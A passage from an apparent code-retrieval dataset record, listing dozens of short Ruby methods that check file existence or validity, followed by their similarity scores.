"def checkForFileExistence(fileName)\n raise \"#{fileName} file already exists\" if File.exist?(fileName);\nend",
"def filecheck\n return file.nil? ? false : File.exist?(file)\n end",
"def has_file? name\n File.file? path / name\n end",
"def from_file?\n !@scanner.filename.nil?\n end",
"def file_exists?(file)\n false\n end",
"def check_for_file(format)\n File.exists?(\"#{@work.download_basename}.#{format}\")\n end",
"def valid?\n ensure_file_open!\n\n ['Makefile', 'submission/', 'tests/'].all? { |entry| @file.find_entry(entry).present? }\n end",
"def file?\n not identifier.blank?\n end",
"def has_file\n if id == nil \n false\n else\n FileTest.exists?( local_file_path )\n end\n end",
"def validate_file_is_included\n if workflow_file.nil? && @file_data.nil?\n errors.add :workflow_file,\n \" missing, please select a file and try again\"\n end\n end",
"def file_exists?(file_name)\n test(\"[ -f #{file_name} ]\")\n end",
"def check_file_context(target)\n file = target.eval('__FILE__')\n file == Pry.eval_path || (file !~ /(\\(.*\\))|<.*>/ && file != '' && file != '-e')\n end",
"def transition_exist?(filename)\n test_file_existence(filename, Transitions_Path, @transition_data)\n end",
"def is_file_input?(command_line_arguments)\n\t\tcommand_line_arguments.any?\n\tend",
"def contain?(filename); end",
"def file?(path)\n # :nocov:\n false\n # :nocov:\n end",
"def file? filepath\n self.system \"test -f #{filepath}\"\n end",
"def check_file_presence\n spec.icons.values.each do |path|\n fail_if_not_exist \"Icon\", path\n end\n\n if spec.browser_action\n fail_if_not_exist \"Browser action popup\", spec.browser_action.popup\n fail_if_not_exist \"Browser action icon\", spec.browser_action.icon\n end\n\n if spec.page_action\n fail_if_not_exist \"Page action popup\", spec.page_action.popup\n fail_if_not_exist \"Page action icon\", spec.page_action.icon\n end\n\n if spec.packaged_app\n fail_if_not_exist \"App launch page\", spec.packaged_app.page\n end\n\n spec.content_scripts.each do |content_script|\n content_script.javascripts.each do |script_path|\n fail_if_not_exist \"Content script javascript\", script_path\n end\n content_script.stylesheets.each do |style_path|\n fail_if_not_exist \"Content script style\", style_path\n end\n end\n\n spec.background_scripts.each do |script_path|\n fail_if_not_exist \"Background script style\", script_path\n end\n\n fail_if_not_exist \"Background page\", spec.background_page\n fail_if_not_exist \"Options page\", spec.options_page\n\n spec.web_intents.each do |web_intent|\n fail_if_not_exist \"Web intent href\", web_intent.href\n end\n\n spec.nacl_modules.each do |nacl_module|\n fail_if_not_exist \"NaCl module\", nacl_module.path\n end\n\n spec.web_accessible_resources.each do |path|\n fail_if_not_exist \"Web accessible resource\", path\n end\n end",
"def check_for_required_files(opts={})\n missing_files = 0\n $generated_files.each do |f|\n if !File.exists?(f)\n puts \"Required file missing: #{f}\"\n missing_files +=1\n end\n end\n if missing_files > 0\n error = \"#{missing_files} required files not found. Run `rake build` before deploying.\"\n if opts[:warning] then puts error else fail error end\n end\nend",
"def has_file?(filename)\n\t\t!self.files.detect(filename).nil?\n\tend",
"def validate_file(file)\n end",
"def check_and_print_video_file_name()\n is_success = true\n video_file_name = @options.video_file_name()\n if !!video_file_name then\n @renderer.print(\"Video: #{video_file_name}\")\n if FileTest.exist?(video_file_name) then\n @renderer.print(\"\\n\")\n else\n @renderer.print(\": does not exist.\\n\")\n is_success = false\n end\n end\n return is_success\n end",
"def check_file?(path)\n Actions.check_file path\n rescue FileError\n false\n else true\n end",
"def ignored_file?(path); end",
"def validate_filename(_item)\n nil\n end",
"def test_file(path)\n return File.file?(path)\nend",
"def test_file_existence(filename, path, file_data = nil)\n return true if file_data&.exists?(filename.downcase)\n return true if File.exist?(format(Common_filename_format, path, filename).downcase)\n false\n end",
"def filter(file, fixture)\n # return ['affix_InterveningEmpty.json'].include?(File.basename(file))\n # File.basename(file) =~ /bugreports_greek/i\n # File.basename(file) =~ /sort_stripmark/i\n # return File.basename(file) =~ /^date_rawparsesimpledate/i\n true\nend",
"def file_exists\n end",
"def relevant_file?(file)\n file.end_with?('_spec.rb')\n end",
"def checkFile(s)\n gracefulExit(\"File #{s} does not exist\") if !File.exist?(s || \"\")\n debugLog(\"File #{s} is OK\")\n s\nend",
"def file_errors_any?\n raise LucarativeAd::Error.file_type unless File.extname(@file) == \".yml\"\n raise LucarativeAd::Error.file_read unless File.exist? @file\n end",
"def should_validate?(_filename)\n raise NotImplementedError\n end",
"def perform_file_validation(_filename, _filehandle)\n raise NotImplementedError\n end",
"def exist; File.exist?(@fname); end",
"def check_exists\n filename = params[\"file\"]\n if !valid_filename(filename, nil)\n Rails.logger.warn(\"check_exists: Invalid filename received (#{filename})\")\n render :json => {error: \"Invalid filename\"}, status: 400\n return\n end\n\n full_filename = ENV[\"EAD_XML_PENDING_FILES_PATH\"] + \"/\" + filename\n exist = File.exist?(full_filename)\n render :json => {exist: exist}\n end",
"def file_exists?(path)\n run(\"test -f #{path}\").success?\n end",
"def file_correct?(file_path)\n raise 'ERROR: Is your file path correct ?' unless File.exist?(file_path)\n end",
"def Check_File(_Filename)\r\n unless File.exist?(\"#{_Filename.to_s}.yml\")\r\n File.open(\"#{_Filename.to_s}.yml\", 'w')\r\n end\r\nend",
"def check\n file_nil\n if @file.end_with?(\".txt\")\n if File.exist?(@file)\n @f = Command_File.new(@file)\n else\n raise \"File \\\"#{@file}\\\" does not Exist\n Please choose a \\\".txt\\\" file that exists\"\n end\n else\n raise \"Invalid Input File \\\"#{@file}\\\"\n File must end in \\\".txt\\\"\"\n end\n end",
"def contents_detected?\n true if find_first_match(:matching => /Gitlab/, :in_file => \"Rakefile\")\n end",
"def check_file(filename)\n lines = []\n line_num = 0\n # Get tags to search in file\n pattern = define_regexp\n # Read lines of file\n File.open(filename, 'r') do |file|\n file.each_line do |line|\n line_num += 1\n lines << [line_num, line] if line =~ /#{pattern}/i\n end\n end\n # Report results in json file\n report_results(filename, lines, 'tags') if @options[:report]\n # Print results if required\n unless @options[:quiet] || lines.empty?\n puts\n @options[:jenkins] ?\n puts(\"=== #{filename} ===\") :\n puts(\"=== #{filename} ===\".bold)\n print_tags(lines)\n end\n 0\n end",
"def file_exists?(filename)\n\tif !File.exists?(filename) \n\t\tabort \"Unable to read file #{filename}\"\n\tend\nend",
"def check_file(filename)\n flog_res = `flog -abcm #{filename}`\n results = parse_flog_output(flog_res)\n unless @options[:quiet] || (results[:total].to_i == 0)\n unless @options[:dev]\n puts\n @options[:jenkins] ?\n puts(\"=== #{filename} ===\") :\n puts(\"=== #{filename} ===\".bold)\n end\n print_complexity_scores(filename, results)\n end\n report_results(filename, results, 'complexity') if @options[:report]\n (results[:total].to_i == 0) ? 0 : 1\n end",
"def file?() end",
"def cry_exist?(filename)\n return File.exist?(filename)\n end",
"def check_file_exists(file_name)\n \tif File.exist?(file_name)\n logger.fatal \"#{file_name} already exists.\"\n \t\tabort\n \tend\n end",
"def valid_file?(file,type)\n\tif type == \"csv\"\n\t\tif file.nil?\n\t\t\tputs \"Please provide a source .csv file\"\n\t\t\texit 0\n\t\tend\n\tend\n\tif !File.exists?(file)\n\t\tputs \"#{file} doesn't seem to exist. Please check\\nyour file path and try again.\"\n\t\texit 0\n\tend\n\ttrue\nend",
"def has_file?(filename)\n self.files.detect {|f| f[:name] == filename }.present?\n end",
"def file_exists?(filename)\n shell_exec(\"test -f #{filename}\")\n rescue\n false\n else\n true\n end",
"def tests_for_file(filename)\n super.select { |f| @files.has_key? f }\n end",
"def verify_target\n # subclasses must implement this method\n puts \"verify_target - not overloaded. file=#{filename}\"\n end",
"def check_files fnames\n fnames.each do |fname|\n AbortIf.abort_unless_file_exists fname\n end\n end",
"def test_file_exists?(host, file_rel_path)\n host.execute(\"test -f \\\"#{get_test_file_path(host, file_rel_path)}\\\"\",\n :acceptable_exit_codes => [0, 1]) do |result|\n return result.exit_code == 0\n end\nend",
"def check_file(name, extension, type)\n file = \"#{name}#{extension}\"\n return false unless loadable? file\n\n @type = type\n @feature = file\n @file_path = file\n @load_path = file\n\n return true\n end",
"def file_name?\n !read_attribute('file_name').blank?\n end",
"def check_file(path)\n raise Error, \"The path '#{path}' does not exist or is not a file\" unless path.file? || attrs[:exists] == false\n end",
"def destination_file_exist?\n File.exist?(final_destination_path)\n end",
"def watched_file?(filename)\n false\n end",
"def filename_ok?(src)\n return false if src.nil? or src.empty?\n\n if src.match bad_image_names_regex\n log \"Found bad filename for image: #{src}\"\n false\n else\n true\n end\n end",
"def check_for fn\n File.readable?( fn ) && fn\n end",
"def file_exists?\n !!file_path\n end",
"def file_exists?\n !!file_path\n end",
"def valid_file?(file)\n case file\n when 'exclude.exclude', 'include.include',\n 'include_exclude.exclude', 'include_exclude.include',\n 'env_exclude.env.exclude', 'env_include.env.include',\n 'include_env_exclude.include', 'include_env_exclude.env.exclude',\n 'include_exclude_env_include.exclude',\n 'include_exclude_env_exclude.include',\n 'include_env_include_env_exclude.env.exclude',\n 'exclude_env_include.exclude',\n 'exclude_env_include.env.include',\n /^include_env_include\\..*include$/,\n /^include_exclude_env_include\\..*include$/,\n /^include_exclude_env_exclude\\..*exclude$/,\n /^include_env_include_env_exclude\\..*include$/,\n /^exclude_env_exclude\\..*exclude$/,\n /^env_include_env_exclude\\.env\\./,\n /^exclude_env_include_env_exclude\\.(env\\.|exclude$)/,\n /^include_exclude_env_include_env_exclude\\./,\n /^env_symbol\\..*include$/\n return true\n when /^default\\./, /^exclude\\./, /^include\\./,\n /^env_exclude\\./, /^env_include\\./, /^include_env_include\\./,\n /^include_env_exclude\\./, /^include_exclude_env_include\\./,\n /^include_exclude_env_exclude\\./, /^exclude_env_include\\./,\n /^include_env_include_env_exclude\\./, /^exclude_env_exclude\\./,\n /^env_include_env_exclude\\./, /^exclude_env_include_env_exclude/,\n /^env_symbol\\./\n return false\n end\n\n # Raise an error if the file was not handled by existing logic.\n raise \"Invalid file (#{file}) specified in #{__method__}.\"\n end",
"def file_exists?(filename, ref)\n return (not `cd #{@path}; git ls-tree #{ref} -- #{filename}`.chomp.strip.empty?)\n end",
"def validFile? filename\n if !filename.kind_of? String\n return false\n elsif File.exists? filename\n return File.readable? filename\n else\n return false\n end\nend",
"def virtual_file?(name); end",
"def process_rb_project(filename, output_path)\n fail 'This feature is under development'.red\nend",
"def file_exists?\n File.exists?(@filename)\n end",
"def file_exists?(file)\n File.exists?(file)\n end",
"def file_exists?(path)\n end",
"def fileExists?(filename)\n shell_exec(\"test -f #{filename}\") rescue return false\n true\n end",
"def check_file_exists(filename)\n\tif File.exist?(filename)\n\t\tputs \"image #{filename} found\"\n\telse\n\t\tabort \"ERROR: image #{filename} not found.\"\n\tend\nend",
"def file?(path)\n eval(FILE_CHECK, binding, __FILE__, FILE_CHECK_LINE)\n nil\nend"
] |
[
"0.7120127",
"0.6571621",
"0.6322864",
"0.63166326",
"0.62577915",
"0.6230915",
"0.6212493",
"0.6163979",
"0.60827714",
"0.6009272",
"0.5990768",
"0.5990521",
"0.5979753",
"0.5979753",
"0.5974482",
"0.5944724",
"0.5919892",
"0.5919619",
"0.5919449",
"0.59115267",
"0.5900052",
"0.58713776",
"0.5864228",
"0.5858817",
"0.5829713",
"0.58248425",
"0.581286",
"0.5810526",
"0.57967824",
"0.5795544",
"0.5793387",
"0.57912046",
"0.5788318",
"0.57866776",
"0.5786513",
"0.5786335",
"0.57856584",
"0.578004",
"0.5777634",
"0.5775468",
"0.57743245",
"0.5773512",
"0.5769102",
"0.57680357",
"0.5757735",
"0.57369494",
"0.5723787",
"0.5718138",
"0.5711349",
"0.57035553",
"0.56979847",
"0.56891185",
"0.56872815",
"0.5686305",
"0.567834",
"0.56738317",
"0.56729245",
"0.56727827",
"0.5665088",
"0.56629497",
"0.5650538",
"0.56500757",
"0.56494164",
"0.5637448",
"0.5634511",
"0.56325996",
"0.56234246",
"0.56206846",
"0.5615732",
"0.5610897",
"0.56086975",
"0.56076664",
"0.56001735",
"0.5594025",
"0.5587536",
"0.5584901",
"0.5580186",
"0.557972",
"0.55789137",
"0.5567699",
"0.55651504",
"0.55622673",
"0.55515414",
"0.5543341",
"0.5541876",
"0.55409604",
"0.5537854",
"0.5530251",
"0.5529867",
"0.5528957",
"0.5522531",
"0.5514121",
"0.551279",
"0.55107665",
"0.551046",
"0.54944575",
"0.54797924",
"0.5478686",
"0.5478041",
"0.5459952"
] |
0.69970137
|
1
|
Quality-filters reads. minlen: discard all shorter reads. Returns nothing
|
def filter(minlen)
return if skip_step?(@names.get('filter'), 'filtering')
# Only filter input files from Illumina CASAVA 1.8 pipeline
if `head -n 1 #{@names.get('reads')} | cut -d ' ' -f 3`.empty?
run_cmd(
'fastq_illumina_filter' \
" --keep N -v -l #{minlen} " \
" -o #{@names.get('filter')}" \
" #{@names.get('reads')}"
)
else
@names.set('filter', '.fastq')
end
end
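Why the header check works: CASAVA 1.8 FASTQ headers carry exactly two space-separated fields (the read id plus a filter/control/index block), so cut -d ' ' -f 3 yields an empty string; pre-1.8 headers contain no space at all, in which case cut echoes the whole non-empty line and the else branch skips filtering. A minimal pure-Ruby sketch of the same test, assuming an uncompressed FASTQ file; the method name is hypothetical:

def casava_1_8?(fastq_path)
  # Inspect only the first header line; Illumina headers use single spaces,
  # so a plain split is equivalent to cut -d ' ' here.
  header = File.open(fastq_path, &:readline).chomp
  header.split(' ').length == 2
end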
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def filter_quality(min_quality)\n mode_lines = @raw_data.scan(/harminv.*:, (\\d.*)/).join \"\\n\"\n CSV.parse(mode_lines,\n :converters => :numeric).find_all {|nums| nums[2].abs > min_quality}\n end",
"def truncate_samples\n @samples.sort!{|a,b| a.duration <=> b.duration}\n @samples.slice!(0..-(max_capacity + 1))\n end",
"def quality_start?\r\n if inn.to_i >= 6 && self.r.to_i < 4\r\n return true\r\n end\r\n return false\r\n end",
"def check_max_samples_exceeded\n # loop over each stripwell and sum the num samples in each to find total num samples\n num_samples = 0\n operations.map { |op| op.input(\"PCR\").collection }.uniq.each do |stripwell|\n num_samples = num_samples + stripwell.num_samples\n end\n if num_samples > 96\n operations.store io: \"input\", interactive: false\n raise \"The fragment analyzer can only hold 96 samples at once. This job has #{num_samples} total samples\"\n end\n num_samples\n end",
"def calculate_min_read \n self.min_read = (content.length / 1375.0).ceil\n end",
"def trim_data\n @buffer.keys.each do |k| \n diff = @buffer[k].count - (1.0 * @scene_width / @x_mul).ceil.to_i\n @buffer[k] = @buffer[k].drop(diff) if diff > 0\n end\n end",
"def quality\n s = ( @step > 0 and semitones - (12 * @step) ) || semitones\n n = ( @step > 0 and number - (7 * @step) ) || number\n QUALITIES[n][s]\n end",
"def trim_requested; end",
"def sample_length_with_overflow(tick_sample_length)\n @tracks.keys.collect {|track_name| @tracks[track_name].sample_length_with_overflow(tick_sample_length) }.max || 0\n end",
"def exec_seq(seq,blast_query)\n\n if ((self.class.to_s=='PluginLowQuality') && seq.seq_qual.nil? ) \n $LOG.error \" Quality File haven't been provided. It's impossible to execute \" + self.class.to_s \n elsif (seq.seq_qual.size>0)\n $LOG.debug \"[#{self.class.to_s}, seq: #{seq.seq_name}]: checking low quality of the sequence\" \n\n @low=@params.get_param('min_quality').to_i\n\n if @params.get_param('window_width').to_i>seq.seq_fasta.length \n @window=seq.seq_fasta.length \n \n else \n @window=@params.get_param('window_width').to_i\n end \n @cut_off=@window*@low \n \n type='ActionLowQuality' \n low_qual=0\n actions=[] \n \n p_begin,p_end =0,-1 # positions from high quality bounds \n \n \n \n while ((p_begin>=0) && (p_end + 1 < seq.seq_qual.size) ) \n \n \n p_begin_old,p_end_old= p_begin, p_end\n p_begin,p_end = find_high_quality(seq.seq_qual,p_end+1) \n \n if ((p_begin>0) && (p_begin-p_end_old-1>=@window/2)) #if we have found the high quality part, and the low quality part has enough size \n # it's created an action before of the high quality part \n add_action_before_high_qual(p_begin,p_end,actions,seq,p_end_old+1) \n\n # puts \"low1 ini fin #{p_end_old+1} #{p_begin-1} = #{p_begin-1-p_end_old-1+1}\" \n low_qual = p_begin-1-p_end_old-1 + 1 \n \n add_stats('low_qual',low_qual)\n # @stats[:low_qual]={low_qual => 1} \n \n end\n \n # puts \"-----ññññ----- high quality #{p_begin} #{p_end}+#{seq.insert_start} seq size #{seq.seq_fasta.size}\"\n\n end\n \n # puts \"high [#{p_begin}, #{p_end}] old [#{p_begin_old}, #{p_end_old}] size #{seq.seq_qual.size}\" \n if ((p_begin>=0) && (p_end+1<seq.seq_qual.size)) #if we have found the high quality part \n \n # it's created an action after of the high quality part \n add_action_after_high_qual(p_begin,p_end,actions,seq) \n # puts \"low2 ini fin #{p_end+1} #{seq.seq_fasta.size-1} = #{seq.seq_fasta.size-1-p_end-1+1}\"\n low_qual = seq.seq_fasta.size-1 - p_end-seq.insert_start-1 + 1\n # if @stats[:low_qual][low_qual].nil?\n # @stats[:low_qual][low_qual] = 0\n # end\n # @stats[:low_qual][low_qual] += 1 \n add_stats('low_qual',low_qual) \n # @stats[:low_qual]={low_qual => 1} \n end \n\n # puts \"-----ññññ----- high quality #{p_begin} #{p_end}\" \n \n \n if p_end<0 and p_end_old #add action low qual to all the part \n a = seq.new_action(p_end_old+1 ,seq.seq_fasta.size-1,\"ActionLowQuality\") # adds the ActionInsert to the sequence before adding the actionMid\n # puts \"new low qual start: #{p_end_old+1} end: #{seq.seq_fasta.size-1} = #{seq.seq_fasta.size-1 - p_end_old-1 + 1}\" \n low_qual = seq.seq_fasta.size-1 - p_end_old-1 + 1 \n \n # if @stats[:low_qual][low_qual].nil?\n # @stats[:low_qual][low_qual] = 0\n # end\n # @stats[:low_qual][low_qual] += 1 \n add_stats('low_qual',low_qual) \n # @stats[:low_qual]={'low_qual' => 1} \n \n actions.push a\n end\n \n # puts \"------- ADDING ACTIONs LOW QUAL #{actions.size}\" \n seq.add_actions(actions)\n end \n\n end",
"def optimize(original_song, max_pattern_length)\n # 1.) Create a new song, cloned from the original\n optimized_song = original_song.copy_ignoring_patterns_and_flow\n\n # 2.) Subdivide patterns\n optimized_song = subdivide_song_patterns(original_song, optimized_song, max_pattern_length)\n\n # 3.) Prune duplicate patterns\n optimized_song = prune_duplicate_patterns(optimized_song)\n\n optimized_song\n end",
"def trim_silence\n AudioFile.new(Audio.trim_silence(0.03, 0.1, @audio))\n end",
"def quality(pipeline, level)\n pipeline.quality!(level)\n end",
"def rescaling_required?\n flac_info.streaminfo[\"bits_per_sample\"] != 16\n end",
"def decrease_quality_by1(item)\n if item.quality > @min_quality # ENSURE QUALITY NEVER NEGATIVE\n item.quality -= 1\n end\n end",
"def quality?(quality)\n quality >= 0 && quality < 50\n end",
"def trim(seqses)\n # Avoid truly horrific quadratic behavior. TODO: I think there\n # may be a way to get perfect trimming without going quadratic.\n return seqses.flatten(1) if seqses.size > 100\n\n # Keep the results in a separate array so we can be sure we aren't\n # comparing against an already-trimmed selector. This ensures that two\n # identical selectors don't mutually trim one another.\n result = seqses.dup\n\n # This is n^2 on the sequences, but only comparing between\n # separate sequences should limit the quadratic behavior.\n seqses.each_with_index do |seqs1, i|\n result[i] = seqs1.reject do |seq1|\n # The maximum specificity of the sources that caused [seq1] to be\n # generated. In order for [seq1] to be removed, there must be\n # another selector that's a superselector of it *and* that has\n # specificity greater or equal to this.\n max_spec = _sources(seq1).map do |seq|\n spec = seq.specificity\n spec.is_a?(Range) ? spec.max : spec\n end.max || 0\n\n result.any? do |seqs2|\n next if seqs1.equal?(seqs2)\n # Second Law of Extend: the specificity of a generated selector\n # should never be less than the specificity of the extending\n # selector.\n #\n # See https://github.com/nex3/sass/issues/324.\n seqs2.any? do |seq2|\n spec2 = _specificity(seq2)\n spec2 = spec2.begin if spec2.is_a?(Range)\n spec2 >= max_spec && _superselector?(seq2, seq1)\n end\n end\n end\n end\n result.flatten(1)\n end",
"def remove_dead_ends(minlen)\n segments.each do |s|\n c = connectivity(s)\n rm(s) if s.length < minlen and\n (c[0] == 0 or c[1] == 0) and\n !cut_segment?(s)\n end\n self\n end",
"def filter_lengths(strings, length=5)\n strings.select { |string| string.length >= length }\nend",
"def trim_silence!\n @audio = Audio.trim_silence(0.03, 0.1, @audio)\n nil\n end",
"def filter_lengths(strings, length=5)\n strings.select { |each| each.length >= length }\nend",
"def remaining_filters\n filters[@processed..-1]\n end",
"def stopstop minsize=30\n type = \"XX\"\n orfs = []\n translate = Nucleotide::Translate.new(@trn_table)\n aa_frames = translate.aa_frames(@seq)\n num = 0\n aa_frames.each do | aa_frame |\n frame = aa_frame[:frame]\n aa = aa_frame[:sequence]\n aa_start = 0\n aa.split(/\\*/).each do | candidate |\n if candidate.size >= minsize and candidate.size > 0\n orf = ORF.new(num,type,@id,@descr,@seq,frame,aa_start*3,candidate)\n orfs.push orf\n num += 1\n end\n aa_start += candidate.size + 1\n end\n end\n orfs.sort\n end",
"def doing_raw_file_to_verified_unique_researches # adjustable line length filter\n consumer = Fiber.new do |producer, queue|\n a = File.read(\"../../Documents/20111224-research.txt\")\n\t new = a.to_textual\n#TODO finishe\t \n @megadata = a.sort do |x,y|\n x.downcase <=> y.downcase\n end\n @megadata_unique = @megadata.uniq\n f = open(\"./tmp/database_doings/doing_uniques/uniques_done.txt\", \"a\") do |f| \n loop do\n queue = producer.transfer(consumer, queue)\n puts f << queue\n queue.clear\n end\n raise StopIteration\n end\n end\n producer = Fiber.new do |consumer, queue|\n #IO.foreach(\"./tmp/database_doings/doing_uniques/uniques_todo.txt\") do |line|\n queue = \"\"\n puts queue\n @megadata_unique.each do |line|\n sequence_text = line.to_textual.de_comma\n if sequence_text.length < 50 # adjustable\n puts \"line ignored due to length\"\n elsif Sequence.find_by_sequence_text(sequence_text)\n puts \"line ignored as it is already in database : \" + \"#{sequence_text}\"\n else\n sequence_creation = sequence_text.de_space unless nil\n sequence_complete = sequence_text.split(//).sort.join('').strip unless nil\n sequence_lexigram = lexigram_sequencer(sequence_text) unless nil\n sequence_singular = sequence_complete.squeeze unless nil\n description = \"research\"\n reference = \"literoti\"\n anagram = 0\n name = 0\n phrase = 0\n research = 1\n external = 0\n internal = 0\n created_at = \"2011-12-21 12:12:00\"\n #line = \"#{sequence_text}\\n\"\n line = \"#{sequence_text}\\t#{sequence_creation}\\t#{sequence_complete}\\t#{sequence_lexigram}\\t#{sequence_singular}\\t#{description}\\t#{reference}\\t#{anagram}\\t#{name}\\t#{phrase}\\t#{research}\\t#{external}\\t#{internal}\\t#{created_at}\\n\"\n queue << line\n break unless line\n consumer.transfer queue\n queue.clear\n end\n end\n end\n raise StopIteration\n end",
"def filter_by_filesize(images, min_bytes, max_bytes)\n found = 0\n images.map do |image|\n bytes = get_bytes_for_image image\n log \"%s bytes - %s\" % [bytes, image]\n if found < 20 and bytes and (bytes == 0 or bytes > min_bytes) and bytes < max_bytes\n log \"filter_by_filesize: Found potential image - size: #{bytes} bytes, src: #{image}\"\n found += 1\n image\n else\n nil\n end\n end.compact\n end",
"def filtered_scan_minimum\n filtered_scan.tap do |scan|\n scan.cache_blocks = false\n scan.setMaxVersions 1\n\n # A filter that will only return the first KV from each row\n # A filter that will only return the key component of each KV\n filters = [FirstKeyOnlyFilter.new, KeyOnlyFilter.new]\n if flist = scan.getFilter\n filters.each do |filter|\n flist.addFilter filter\n end\n else\n scan.setFilter FilterList.new(filters)\n end\n end\n end",
"def strict_filters; end",
"def ex1\n WaveFile::Reader.new(\n File.expand_path('../440Hz,441samples.wav', File.dirname(__FILE__))\n ) do |reader|\n samples = reader.read(441).samples.to_a\n #puts samples.map(&:inspect).join(\",\")\n samples_to_graph!(samples, '440constant')\n embiggen_and_imgcat!('440constant')\n end\nend",
"def quality\n base.quality\n end",
"def less_than_fifty_filter(item)\r\n special_item_routing(item) if is_less_than_fifty_quality?(item)\r\n end",
"def compress\n input_len = @input.bytesize\n tmp = optipng(quantize(@input))\n\n # Check to see whether we've improved the situation\n output_len = tmp.bytesize\n if input_len > output_len\n $LOG.debug \" %d bytes -> %d bytes = %.1f%%\" % [ input_len, output_len, 100 * output_len/input_len ] if $LOG.debug?\n @output = tmp\n @modified = true\n else\n $LOG.debug \" no gain\" if $LOG.debug?\n @output = @input\n @modified = false\n end\n self\n end",
"def filter; end",
"def filter; end",
"def filter; end",
"def trim_length\n \t400\n end",
"def doing_verified_unique_researches # adjustable line length filter\n consumer = Fiber.new do |producer, queue|\n a = File.readlines(\"./tmp/insert_researches.txt\")\n @megadata = a.sort do |x,y|\n x.downcase <=> y.downcase\n end\n @megadata_unique = @megadata.uniq\n f = open(\"./tmp/database_doings/doing_uniques/uniques_done.txt\", \"a\") do |f| \n loop do\n queue = producer.transfer(consumer, queue)\n puts f << queue\n queue.clear\n end\n raise StopIteration\n end\n end\n producer = Fiber.new do |consumer, queue|\n #IO.foreach(\"./tmp/database_doings/doing_uniques/uniques_todo.txt\") do |line|\n queue = \"\"\n puts queue\n @megadata_unique.each do |line|\n sequence_text = line.to_textual.de_comma\n if sequence_text.length < 52 # adjustable\n puts \"line ignored due to length\"\n elsif Sequence.find_by_sequence_text(sequence_text)\n puts \"line ignored as it is already in database : \" + \"#{sequence_text}\"\n else\n sequence_creation = sequence_text.de_space unless nil\n sequence_complete = sequence_text.split(//).sort.join('').strip unless nil\n sequence_lexigram = lexigram_sequencer(sequence_text) unless nil\n sequence_singular = sequence_complete.squeeze unless nil\n description = \"research\"\n reference = \"literoti\"\n anagram = 0\n name = 0\n phrase = 0\n research = 1\n external = 0\n internal = 0\n created_at = \"2011-12-21 12:12:00\"\n #line = \"#{sequence_text}\\n\"\n line = \"#{sequence_text}\\t#{sequence_creation}\\t#{sequence_complete}\\t#{sequence_lexigram}\\t#{sequence_singular}\\t#{description}\\t#{reference}\\t#{anagram}\\t#{name}\\t#{phrase}\\t#{research}\\t#{external}\\t#{internal}\\t#{created_at}\\n\"\n queue << line\n break unless line\n consumer.transfer queue\n queue.clear\n end\n end\n end\n raise StopIteration\n end",
"def add_result_trimmed_reads(base, _opts)\n return nil unless result_files_exist?(base, \".1.clipped.fastq\")\n r = MiGA::Result.new(\"#{base}.json\")\n if result_files_exist?(base, \".2.clipped.fastq\")\n r = add_files_to_ds_result(r, name,\n pair1: \".1.clipped.fastq\", pair2: \".2.clipped.fastq\",\n single: \".1.clipped.single.fastq\")\n else\n r = add_files_to_ds_result(r, name, single: \".1.clipped.fastq\")\n end\n r.add_file(:trimming_sumary, \"#{name}.1.fastq.trimmed.summary.txt\")\n r\n end",
"def filter_by_precursor_mass_tolerance!\n pmt = params.peptide_mass_tolerance.to_f\n methd = nil # the method to \n\n case params.peptide_mass_units\n when '0'\n amu_based = true\n milli_amu = false\n when '1'\n amu_based = true\n milli_amu = true\n when '2'\n amu_based = false\n end\n\n self.filtered_by_precursor_mass_tolerance = true\n self.out_files.each do |out_file|\n hits = out_file.hits\n before = hits.size\n hits.reject! do |pep|\n if amu_based\n if milli_amu\n (pep.deltamass.abs > (pmt/1000))\n else\n (pep.deltamass.abs > pmt)\n end\n else\n (pep.ppm.abs > pmt)\n end\n end\n if hits.size != before\n out_file.hits = hits # <- is this necessary \n Mspire::Sequest::Srf::Out::Peptide.update_deltacns_from_xcorr(hits)\n out_file.num_hits = hits.size\n end\n end\n self\n end",
"def quality_and_strip(percentage)\n manipulate! do |img|\n img.format('jpg') # We want to enforce jpeg so we can use good compression.\n img.strip # Do not store EXIF data in the thumb to save space\n img.quality(percentage.to_s)\n img = yield(img) if block_given?\n img\n end\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) 